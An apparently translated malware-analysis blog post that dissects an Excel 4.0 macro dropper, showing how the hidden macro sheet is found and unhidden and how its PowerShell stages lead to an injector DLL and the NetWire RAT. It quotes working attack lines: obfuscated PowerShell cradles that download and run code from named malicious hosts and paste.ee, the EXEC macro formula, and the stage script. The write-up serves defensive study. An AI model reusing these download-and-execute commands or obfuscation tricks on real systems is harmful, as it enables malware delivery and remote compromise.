A workman who wants to do good work must first sharpen his tools. Since the file in question is a macro virus, Office has to be installed locally; this article uses Office 2016. Open the file in Excel. Hm, why does it look nothing like a normal Excel worksheet? If you bother to OCR the picture, it roughly says that the content can only be viewed after macros are enabled. The whole point is to lure the user into enabling macros, so as soon as a document containing macro code is opened, Excel prompts you to enable them. Heh, the right move is simply not to.
As for macro viruses, the author hasn't dealt with many (being a tool-party person), but has previously used the Python tool oletools. In a Python 2.7 environment the install command is: pip install oletools.
Once installed, use mraptor (MacroRaptor) from oletools to check whether the file is suspicious; it flags the file as suspicious, as shown below.
Trying to extract the malicious macro with olevba fails with a parse error, as shown below.
If you haven't dealt with macro viruses before, you'll be baffled at this point. The reason is that this sample contains no VBA macro at all; what was detected is an Excel 4.0 macro (a technique that has been around longer than I've been alive, truly), with its attribute set to hidden.
I won't say much about Excel 4.0 macros here, because the reference links at the end explain them in detail; read those if you're interested, otherwise just follow the author's steps below. Although the malicious code can't be extracted by hand this way, a shortcut is to grab the executed commands from a sandbox, as follows.
Stage one command:
powershell -command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://putin-malwrhunterteams.com/scan.txt');
Stage two is the content of scan.txt, shown below; IEX executes it as script content.
PowERsHELl.`ExE -ExecutionPolicy bypass -w 1 /e [base64-encoded script omitted] | &('I'+'EX')
This sample cannot be unhidden through the right-click menu: the macro sheet does not appear in the workbook at all, so right-clicking offers no unhide option. Instead, the oledump tool can help; the command used is:
oledump_V0_0_50>oledump.py -p plugin_biff.py --pluginoptions "-o BOUNDSHEET -a" C:\Users\onion\Desktop\Dokumentation.xls\Dokumentation.xls
This gives the position sequence 51 AA 02 00 01; in the state byte, 0x00 means visible, 0x01 hidden and 0x02 very hidden.
Patch the hex directly by hand, as shown below.
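As an added example (not code from the original post), here is a small Python parser for the BIFF BOUNDSHEET records that oledump's plugin_biff reads. It operates on the raw Workbook stream extracted from the OLE container, lists each sheet's type and hidden state, and clears the hsState byte exactly as the manual hex edit does; the stream bytes are constructed to mirror the 51 AA 02 00 01 sequence above.

```python
import struct

BOUNDSHEET = 0x0085   # BoundSheet8 record id in the BIFF8 Workbook stream
EOF_RECORD = 0x000A
HS_STATE = {0x00: "visible", 0x01: "hidden", 0x02: "very hidden"}
SHEET_TYPE = {0x00: "worksheet", 0x01: "Excel 4.0 macro sheet", 0x02: "chart", 0x06: "VBA module"}

def iter_records(stream):
    """Walk the BIFF record chain: 2-byte id, 2-byte length, body."""
    off = 0
    while off + 4 <= len(stream):
        rid, rlen = struct.unpack_from("<HH", stream, off)
        yield off, rid, stream[off + 4:off + 4 + rlen]
        off += 4 + rlen

def list_sheets(stream):
    """One dict per BOUNDSHEET record: record offset, sheet name, sheet type, hidden state."""
    sheets = []
    for off, rid, body in iter_records(stream):
        if rid != BOUNDSHEET:
            continue
        # lbPlyPos (4) | hsState (1) | dt (1) | cch (1) | fHighByte flag (1) | name chars
        _plypos, hs_state, dt, cch, flags = struct.unpack_from("<IBBBB", body, 0)
        raw = body[8:8 + cch * (2 if flags & 1 else 1)]
        name = raw.decode("utf-16-le" if flags & 1 else "latin-1")
        sheets.append({"offset": off, "name": name,
                       "type": SHEET_TYPE.get(dt, "0x%02x" % dt),
                       "state": HS_STATE.get(hs_state & 0x03, "?")})
    return sheets

def unhide_all(stream):
    """Clear the hsState bits of every BOUNDSHEET record, the same patch as the manual hex edit."""
    buf = bytearray(stream)
    for off, rid, _body in iter_records(stream):
        if rid == BOUNDSHEET:
            buf[off + 4 + 4] &= 0xFC   # hsState byte follows the 4-byte header and 4-byte lbPlyPos
    return bytes(buf)

def _boundsheet(plypos, hs_state, dt, name):
    # Build a constructed BIFF8 BOUNDSHEET record with a compressed (8-bit) sheet name
    body = struct.pack("<IBBBB", plypos, hs_state, dt, len(name), 0) + name.encode("latin-1")
    return struct.pack("<HH", BOUNDSHEET, len(body)) + body

# Constructed Workbook stream: a visible worksheet plus a hidden Excel 4.0 macro sheet whose
# record carries the same "51 AA 02 00 01" bytes (lbPlyPos + hsState) seen with plugin_biff
SAMPLE_STREAM = (_boundsheet(0x00000200, 0x00, 0x00, "Sheet1")
                 + _boundsheet(0x0002AA51, 0x01, 0x01, "Macro1")
                 + struct.pack("<HH", EOF_RECORD, 0))
```

Writing the result of unhide_all back into the Workbook stream of a copy of the file makes the macro sheet visible on the next open, which is what the hex edit in the screenshot achieves.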
After saving and reopening, the macro sheet appears, but the macro code still cannot be seen because the font colour has been set to white, another anti-analysis trick to add confusion.
Select the cells and change the font colour to reveal the macro code.
Because the text displays as blank, you can copy it, create a new XLM 4.0 macro sheet, paste it into that sheet, select everything and change the text colour to view it. Aha, there are obvious traces of a PowerShell script.
Finally, tidied up, the complete code is as follows.
Formula cells of the macro sheet, in execution order:
=EXEC("powershell -command " & "IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'t" & A9588)
=RETURN()
Text cell A9588, which the EXEC formula concatenates onto the end of the command:
p://putin-malwrhunterteams.com/scan.txt');exit
The response content obtained is as follows.
PowERsHELl.`ExE -ExecutionPolicy bypass -w 1 /e [base64-encoded script omitted, identical to the scan.txt content above] | &('I'+'EX')
Decoding further yields the deobfuscated PowerShell script.
Reading the script carefully, the first part is junk code plus added delays; the end calls CallByName to download and execute the next stage. The addresses are //paste.ee/r/e49u0 and //paste.ee/r/dlOMz.
Function ZhZg{ param($xIxfmTFLHvQRN , $GPtEltKSlSBIDwArOphrhFygxx , $qfjydzoRxRgPADeXfddPJKQhakVwARMHovTnCTXIPf) $DiSCThogPCXterQgFZbEkrVLGUAeHqzAD = 'tSyJnGHnXzweeXOWUIycCLNHwyhKY'; $CWpvyyivlUxxUVObqdPlWq = 'bfi'; $rMoZw = 'yxapiZPoYWefF'; $rsVIEumCLUOQPuqjwvAiVYomHDAxyTXwZrMy = 'gVBbwlGbSJVxoajeWVTDiBAupDrwRqXhsrQZy'; $YmiLoue = 'Jt'; $RCWtvJeVHmstJJbloFxJJgQwgVWMGQpuyH = 'oB'; } $ximErUgtYCNIquMkflmZMZmROrwyvCInjA = 'OXEovQnx'; If ('zxZuiObPBcbXwUpzYi' -eq 'VtaYqmxMbwrJZcRSRRBPgatlHYkSCOoXhobbYZjHkB') { $SK = 'CveCYiWSRvzoQRCfK'; $HTbkAqtrhuff = 'bbpVpoApGBPWfbjIRFFqnLq'; $SunIhAcnlVYNbwNrJXASMNVPJiQoaomPkxDu = 'sI'; $YclKCW = 'UsNgQKXeEZYyyknMwiIcdtSrROvt'; $cKMnBvwMIWFMTyVbtKVlPobutDbZWOB = 'dubOMKwpqAoLDP'; $vwPYEaIUoi = 'txTXptVqiYWHOiNf'; } $PzQqetgcHqxoVanfuRyVTKvqMglYpApquOEpSaP = 'nuiCX'; DO{ $ZbtSLTmpNgYbknzltwSwgGbBQHGdk = 'APUbBdKGSdURaa'; $gJTVMTXjxBSzrCDMJFygIGIlW = 'ndobOgBYkxnHXvdgXZidSDP'; $LMbtUZAhzlgtuVnm = 'TSGZBhDCcjiDsIjOXQCEIEKwFIlPjlBmvfzlIsJeYr'; $qSeGdxeXFkipPHJTswnSrhwHNJxFeGYgQMTeb = 'ISF'; $wBNpjezYQikY = 'JV'; $sTzYtyMBZDnerqnVNdku = 'XZTGFqqvsLKIFJoSgUyoLQgqVhauOKWYbcUugSn'; $Nyi= $Nyi + 1;} While ($Nyi -ne 6) While ($WGgrdVmg -ne 6) { $DgJmFiHtclYPvgholhcoulNhqSFkoNzutuLdNmVuNBD = 'OsaZyCsoJsFRTcvncXEPleWBVEbyL'; $WGgrdVmg= $WGgrdVmg + 1;$atifTxrflmVLkAptKkriRqwowjWZD = 'atcbRLjnJxvxlSuatVLctrHdRkwtjjbSbrLbiJj'; $WGgrdVmg= $WGgrdVmg + 1;$JWbtmTEetVqAObAjmzJgPpDZWd = 'tHSrkmhSWPNqxfRzOtb'; $WGgrdVmg= $WGgrdVmg + 1;$zrbp = 'zCOUTBXJyLXbdFOhJdUYIMAyqpgvZV'; $WGgrdVmg= $WGgrdVmg + 1;$fdI = 'jTyDNqgyUuYknMWqNHQanBQdeUbjcIs'; $WGgrdVmg= $WGgrdVmg + 1;$VVfOLaGhcNfEREtiDfoYNhxhCUZtOxWMCbPRhIenA = 'yZVMMabtgwTTknYxLrANTerTCpocBv'; $WGgrdVmg= $WGgrdVmg + 1;} Function ovqrmSkyxRPOmuQyQcrskoQGLPaHTLvqRAVFOBl{ param($BXe , $XLqHzRVQZsirctjxmmnPTiCKWlzrlv , $vFEAmUkBvxOSbTyLi , $yOOkOPoJgkNSdfdZ , $lYsxcCkrSFQbqYZQZngEKqoLdozocTioB , $MnqVVMdswKYhpMnCDswVcvjgToDw , $yWcZKLlaERUbSu , $nvymAZQqrgERDJBhJhdynwIfBB , $zacuKAFsYqQwpigksFtiQDkL) 
$fxsRRWGLdjAatTJAfkgXs = 'elVYxmYLjPrTMnvzopJPejLVx'; $qVZeVOfCSGvsYTmRAkjZHVEgvrNdyvZAbzvDmEudoJ = 'pDwQpcNjamXqVQtjdA'; $EXg = 'RYXievqGlxAPczaYAlLyNEJantVQcmFxIHfsRuin'; $fmsUBQkDcBTLhhMPxvlaadysDGUTiGF = 'YOiR'; $FlclMAkllbaScU = 'wMJCnARvvQUVvQmSzvzsJJpNdOGReuBGmGGMFfePoqg'; $seoVyIaXcbqnWwZZtz = 'BOOjpKaNTQjEScV'; $yZlTWTedKQSpJGFWoZf = 'dvzKYu'; $GtXXLBa = 'zHguhklZZrlENKNPtwPsDZb'; $bNXkmsHnifFPHfyUrWaSmpswgHeOmiXaglSTNBm = 'kxWiExHNyuAhzIImUbDfOtBAHfiW'; $eHqkuioTKriA = 'QrhqaXdgzmxGRrw'; $aZPlATnJxFZTSJjVfyc = 'SRFKtgeVs'; $crrxkSTOPwEYsVyJNqCcbSOnD = 'UEsUoSRU'; $ibVYRCQjfEuYjMjSoSQBJcDtc = 'OWuImGYsPhsRkZLjjjJjkrJCAzATSFXbwTnupXSnAr'; $BZXiqpatUksNXMsInGFZJJRUQmQuLRVjtuHccQJds = 'DrDGQhwPehu'; } $nrICREYghDOJUcFP = 'WwchxGaQKVjxwmoobHPUazFELez'; Function jHfOVmAuARmkqIAxMGHkUVbA{ param($ulnbhkIkSjplhlGipjlRZUsVp , $EXrXVTHxWYiHQMeDWrRemosWOcshCZtSmlfltuOW , $kPiAhSYnWyADLIPeUItaZuwfP , $ehtJcdvBCZKWgJTugbs , $adPGZlVvDpSCl , $oruMWWIKGqUy) $FWGQWZmbJloYbxPkRn = 'HcfNIMtjMNHOfetPQueesAI'; $XLYlJrAChBsrZIxEdpZNCXIuhhzp = 'JhHTyqwnIaUMEgdlCpIwZBCaufzDeEbsKO'; $TlYbRBQUPFBxqeIfsqsNI = 'hYTrtIEybCqJKAdOrvJgnUthJY'; $YjBRAPoEzIZIHQQdzGh = 'IBezxEcrMeliUmfPak'; } $reg = ('{2}{0}{1}{3}'-f'dSt','rin', `D`o`wn`l`oa ,'g'); [void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic'); $fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object `N`e`T`.`W`e`B`C`l`i`e`N`T ),$reg,[Microsoft.VisualBasic.CallType]::Method,'htt'+[Char]80+'' + [Char]58 + '//paste.ee/r/e49u0').Replace("@@", "44").Replace("!", "78")|IEX; [Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object `N`e`T`.`W`e`B`C`l`i`e`N`T ),$reg,[Microsoft.VisualBasic.CallType]::Method,'htt'+[Char]80+'s' + [Char]58 + '//paste.ee/r/dlOMz').replace('$$','0x')|IEX; [k.Hackitup]::exe('MSBuild.exe',$f)
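As an added example (not the author's code), a small Python helper that undoes the four string tricks this sample's PowerShell relies on: backtick-split identifiers, [Char]N literals, the -f format-operator reordering that hides DownloadString, and '+' concatenation of string pieces. The sample inputs are constructed after the script above, with example.invalid in place of the real hosts.

```python
import re

def strip_backticks(s):
    # new`-OB`jeCT / `N`e`T: a backtick before an ordinary character is a no-op outside strings
    return re.sub(r"`(.)", r"\1", s)

def resolve_chars(s):
    # [Char]80 -> 'P', [Char]58 -> ':'
    return re.sub(r"\[Char\](\d+)", lambda m: "'" + chr(int(m.group(1))) + "'", s, flags=re.I)

_FMT = re.compile(r"\(\s*'([^']*)'\s*-f\s*((?:'[^']*'|[^,()']+)(?:\s*,\s*(?:'[^']*'|[^,()']+))*)\s*\)")

def resolve_format(s):
    # ('{2}{0}{1}{3}'-f'dSt','rin','Downloa','g') -> 'DownloadString'
    def rebuild(m):
        args = [a.strip().strip("'") for a in m.group(2).split(",")]
        return "'" + re.sub(r"\{(\d+)\}", lambda n: args[int(n.group(1))], m.group(1)) + "'"
    return _FMT.sub(rebuild, s)

def join_concats(s):
    # 'ht'+'tp' -> 'http'; loop because each pass only merges adjacent pairs
    prev = None
    while prev != s:
        prev = s
        s = re.sub(r"'([^']*)'\s*\+\s*'([^']*)'", r"'\1\2'", s)
    return s

def deobfuscate(expr):
    """Apply the four transforms in the order the sample's tricks nest."""
    for step in (strip_backticks, resolve_chars, resolve_format, join_concats):
        expr = step(expr)
    return expr

# Constructed inputs modelled on the sample, with example.invalid in place of the real hosts
STAGE1 = "IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://example.invalid/scan.txt')"
METHOD_NAME = "('{2}{0}{1}{3}'-f'dSt','rin', `D`o`wn`l`oa ,'g')"
STAGE2_URL = "'htt'+[Char]80+'' + [Char]58 + '//example.invalid/stage2'"
```

The helper is deliberately limited to the patterns seen in this sample; it does not tokenise PowerShell, so apply it to the extracted expressions rather than to arbitrary scripts.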
The first download, once decoded, turns out to be a DLL that has already been through some processing.
Its real name is Hackitup; from what is shown below one can roughly tell that process injection follows, and combined with the decoded script above, the injected process is MSBuild.exe.
The second download, on a quick analysis, is the NetWire RAT.
The C2 is surely dead by now, but I'll paste it anyway.
https://app.any.run/tasks/b37be5b0-1460-4dd1-992e-72ec74cec8fe/
https://app.any.run/tasks/25084eac-2823-4887-8f90-42623b01c2ae/
https://app.any.run/tasks/0ddc9dc1-0ff9-43c7-b456-35a296998809/
https://www.freebuf.com/articles/others-articles/236919.html
https://outflank.nl/blog/2018/10/06/old-school-evil-excel-4-0-macros-xlm/
https://zeronohacker.com/analysis-excel-4-0-marco-from-field-office-sample.html